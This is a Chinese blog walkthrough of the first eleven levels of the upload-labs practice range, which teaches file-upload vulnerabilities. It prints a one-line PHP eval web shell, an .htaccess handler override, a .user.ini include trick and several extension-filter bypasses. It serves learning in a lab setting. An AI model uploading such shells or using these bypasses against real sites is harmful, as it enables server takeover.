【靶场】upload-labs-master(前11关)

于 2024-09-03 20:28:22 发布
阅读量382 收藏 6
点赞数 21
分类专栏: # 靶场 文章标签: web安全 网络安全 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_71944965/article/details/141863464
版权

🏘️个人主页: 点燃银河尽头的篝火(●’◡’●)
如果文章有帮到你的话记得点赞👍+收藏💗支持一下哦

【靶场】upload-labs-master(前11关)

第一关 Pass-01

  1. 创建一个一句话木马,将其改为图片文件

一句话木马示例:

<?php @eval($_POST['hacker']); ?>

在这里插入图片描述

  1. 在靶场中上传图片文件并抓包
    在这里插入图片描述

  2. 将抓包到的文件后缀名改为.php
    在这里插入图片描述

  3. 返回靶场在新标签页中打开图片
    在这里插入图片描述

  4. 新标签页无任何显示即为成功解析
    在这里插入图片描述

第二关 Pass-02

  1. 查看源码发现后端PHP代码只对type进行了检查
    在这里插入图片描述

  2. 上传图片文件后抓包,将上传的PHP的content-type为image/png
    在这里插入图片描述

第三关 Pass-03

  1. 查看源码,发现禁止上传.php,那我们就上传.php3/.php5
    在这里插入图片描述

  2. 上传图片文件并抓包
    在这里插入图片描述

  3. 更改文件后缀名为.php3/.php5(我这里用了.php5)
    在这里插入图片描述

第四关 Pass-04

  1. 查看源码,发现.htaccess文件没有被禁
    在这里插入图片描述

  2. 试试上传.htaccess文件

先新建一个.htaccess文件,里面写上代码

<FilesMatch "1.jpg">
SetHandler application/x-httpd-php

这串代码的意思是如果文件中有一个1.jpg的文件,他就会被解析为.php,把这个文件上传上去。

上传.hatccess文件后继续上传1.jpg

  1. 在新标签页打开图片

第五关 Pass-05

  1. 查看源码
    源码里把所有可以解析的后缀名都给写死了,包括大小写,转换,空格,还有点号,正常的php类文件上传不了了,并且拒绝上传 .htaccess 文件。
    反复观察发现没有被限制的后缀名有 .php7 以及 .ini
    在这里插入图片描述
    我们可以用.ini绕过
  2. 创建一个.user.ini文件并上传
    在这里插入图片描述

.user.ini文件里的意思是:所有的php文件都自动包含1.jpg文件。.user.ini相当于一个用户自定义的php.ini

  1. 继续上传1.jpg

第六关 Pass-06

  1. 查看源码,发现没有过滤大小写
    在这里插入图片描述

  2. 用大小写绕过
    .php 格式改为.Php 后上传即可

第七关 Pass-07

  1. 查看源码,发现没有首位去空
    在这里插入图片描述

  2. 用空格绕过
    抓包,修改上传文件后缀名为.php⚪(注意这里有个空格)
    在这里插入图片描述

第八关 Pass-08

  1. 查看源码,发现没有过滤文件名末尾的点
    在这里插入图片描述

  2. 可以使用文件名后加.进行绕过
    在这里插入图片描述

第九关 Pass-09

  1. 查看源码,发现没有去除字符串::$DATA
    在这里插入图片描述

  2. 上传图片文件,抓包改后缀为.php::$DATA
    在这里插入图片描述

第十关 Pass-10

  1. 查看源码,发现不能用特殊格式绕过
    在这里插入图片描述

  2. 将文件后缀名改为php. .
    在这里插入图片描述

第十一关 Pass-11

  1. 查看提示
    在这里插入图片描述

  2. 可以用双写绕过
    在这里插入图片描述

点燃银河尽头的篝火(●'◡'●)
关注
  • 21
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
靶场upload-labs-master笔记
qq_51860400的博客
01-05 511
本文简要记录upload-labs-master靶场的通
文件上传 —— 靶场upload-labs-master
weixin_54431413的博客
03-23 7984
upload-labs靶场文件上传,前端和黑白名单验证绕过,代码逻辑问题。
upload-labs靶场-Pass-11-思路以及过程
weixin_44257023的博客
01-16 2683
开始的小准备 upload-labs靶场 是PHP环境运行的,所以我准备了一个PHP脚本和一张图片 图片好准备,PHP脚本如果不想写的话可以用我的这个获取当时间的PHP脚本 <?php header("content-type:text/html;charset=utf-8"); date_default_timezone_set("PRC");//设置时区 echo "当时间为:"; $today = date("Y-m-d D h:i:s A "); echo $today; ?
upload-labs-master本地靶场刷题笔记
m0_63028223的博客
09-05 407
文件上传漏洞,常见的绕过方式。
upload-labs 本地靶场搭建详细教程
m0_73909170的博客
01-29 3018
原文链接:https://blog.csdn.net/2301_77485708/article/details/132111064。phpStudy 官网:https://www.xp.cn/ 安装版的 因为后期配置的靶场包都是复制到安装版的路径下。upload-labs 靶机下载地址: https://github.com/c0ny1/upload-labs。文件上传漏洞 upload-labs 网络安全 Upload-Labs靶场攻防实战。自此,upload-labs靶场已搭建成功。
upload-labs-master打靶总结
一大口木的博客
05-24 435
我的一句话木马的内容是。
upload-labs靶场-Pass-03-思路以及过程
weixin_44257023的博客
01-14 2495
开始的小准备 upload-labs靶场 是PHP环境运行的,所以我准备了一个PHP脚本和一张图片 图片好准备,PHP脚本如果不想写的话可以用我的这个获取当时间的PHP脚本 <?php header("content-type:text/html;charset=utf-8"); date_default_timezone_set("PRC");//设置时区 echo "当时间为:"; $today = date("Y-m-d D h:i:s A "); echo $today; ?
Upload-labs 1-21 靶场攻略(全网最全最完整)
热门推荐
晚安這個未知的世界
03-21 6万+
Pass-1(前端验证) 因为是进行前端JS校验,因此可以直接在浏览器检查代码把checkFile()函数(即如下图红色框选中的函数)删了或者也可以把红色框改成true,并按回车,即可成功上传php文件 复制图片地址并用蚁剑进行连接 Pass-2(MIME验证) 分析代码,可以看到,后端PHP代码只对content-type进行了检查 使用bp抓包,修改上传的PHP的content-type为image/png Pass-3(黑名单验证,特殊后缀) 这题本人使用的是PHP5.2.17环境 分析代码
upload-labs-master介绍、下载与安装【文件上传漏洞靶场
WX公众号-小白学安全
04-06 6126
简介 upload-labs-master,是集合了文件上传中存在的大部分漏洞的一个靶场 下载 GitHub下载:https://github.com/c0ny1/upload-labs 百度网盘: CSDN: 安装 1、打开phpstudy,将upload-labs压缩包解压,并放入www文件夹下 2、由于原文件名过长,故重命名为upload 3、访问http://127.0.0.1/upload/ 4、靶场搭建成功 注意: 若出现如图所示 只需要在upload目录下创建一个新的文件夹,并命名为
Upload-labs-master文件上传靶场项目部署
qq_39330735的博客
02-07 223
基于Xampp来部署Upload-labs-master文件上传靶场,解决文件上传不了的问题
上传文件漏洞靶场upload-labs
09-27
【上传文件漏洞靶场upload-labs】是一个专为网络安全爱好者和初学者设计的实践平台,主要目的是帮助用户深入了解和练习上传文件漏洞。在Web应用程序中,上传功能常常因为设计不当而成为攻击者利用的安全隐患。这个...
WEB渗透学习-upload-labs靶场
04-20
**WEB渗透学习-upload-labs靶场详解** 在网络安全领域,特别是Web渗透测试中,了解和掌握文件上传漏洞是至重要的技能。"upload-labs"靶场是一个专为学习和实践文件上传漏洞设计的平台,它提供了21个卡,从基础...
upload-labs-master【文件上传靶场
04-05
"upload-labs-master【文件上传靶场】" 是一个针对文件上传功能安全性的测试平台,主要目的是帮助开发者、安全人员以及爱好者检验和学习文件上传漏洞的防范措施。在这个靶场中,你可以模拟不同的攻击手段,了解如何...
upload-labs-master.zip
06-22
【描述】描述中的 "文件上传漏洞小游戏靶场upload-labs-master/upload-labs-master/upload-labs-master/upload-labs-master" 显示这是一个针对文件上传漏洞的系列练习,通过多次嵌套的目录结构,可能旨在模拟不同...
网络安全】漏洞挖掘
anquan2233的博客
08-29 1339
在springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法中、会在tokenizer.process()中 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。Payload 的构造可以参考官方测试用例。
人工智能在网络安全领域的应用探索
A526847的博客
08-29 1229
随着网络技术的飞速发展,网络安全问题日益凸显,成为制约数字化进程的重要瓶颈。人工智能(AI)作为一种变革性技术,正逐步在网络安全领域展现出其巨大的潜力和价值。本文旨在探讨人工智能在网络安全领域的应用现状、优势、挑战及未来发展趋势。
入门网络安全工程师要学习哪些内容
最新发布
白帽子佳奇的博客
08-30 924
大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对还是不了解,不知道需要学什么?知了堂小编总结出以下要点。是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和不一样,如果你想成为安全开发工程师,学的侧重点就和安全不一样。学的东西很泛,但选定方向就简单了。大致的学习流程总结就是:网络基础、操作系统、中间件、数据库。其中电脑基础:像系统Windows基础和Linux基础、HTML基础、代码JS基础等。
网络安全入门07安全服务——主机漏洞扫描服务方案
打工人
08-30 669
漏洞扫描服务主要针对系统层、网络层、数据层、应用层进行安全评估,即对客户使用系统的运行环境进行安全评估。
Oracle 网络安全产品安全认证检索
In-Memory Computing Technology
08-30 499
列入《网络键设备和网络安全专用产品目录》的网络安全专用产品应当按照《信息安全技术网络安全专用产品安全技术要求》等相国家标准的强制性要求,由具备资格的机构安全认证合格或者安全检测符合要求后,方可销售或者提供。Oracle Zero Data Loss Recovery Appliance (ZDLRA)属于此类,ZDLRA RA23于2024年7月通过网络安全专用产品安全检测,标志着这款产品完全符合中国政府对于安全产品的要求,包括技术及供应链安全要求。检测结果已在网信办官网上发布。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值